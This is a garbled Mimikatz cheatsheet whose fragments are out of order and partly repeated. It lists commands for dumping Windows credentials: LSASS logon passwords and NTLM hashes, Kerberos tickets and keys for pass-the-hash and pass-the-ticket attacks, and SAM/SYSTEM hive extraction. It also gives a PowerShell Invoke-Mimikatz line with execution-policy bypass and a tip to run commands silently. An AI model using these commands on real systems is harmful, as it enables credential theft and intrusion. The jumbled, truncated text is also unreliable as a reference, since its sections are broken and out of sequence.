| Command | Result | | :--- | :--- | | sekurlsa::logonpasswords | Dumps all active logon sessions (NTLM hashes + plaintext if WDigest is enabled). | | sekurlsa::tickets | Dumps all Kerberos tickets for pass-the-ticket attacks. | | sekurlsa::ekeys | Dumps Kerberos encryption keys (useful for Overpass-the-Hash). | 2. Extract SAM & SYSTEM Hives If LSASS is protected, go directly to the registry.
mimikatz.exe "privilege::debug" "token::elevate" "exit" 1. Grab Passwords from LSASS Memory (sekurlsa) This is the classic "pass-the-hash" or "pass-the-password" attack. mimikatz cheatsheet
Mimikatz is arguably the most powerful and infamous post-exploitation tool ever created. Developed by Benjamin Delpy (@gentilkiwi), it allows security professionals to extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from Windows memory. | Command | Result | | :--- |
# Using Invoke-Mimikatz (from PowerSploit) powershell -exec bypass Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' Save commands to a .txt file and execute silently. Grab Passwords from LSASS Memory (sekurlsa) This is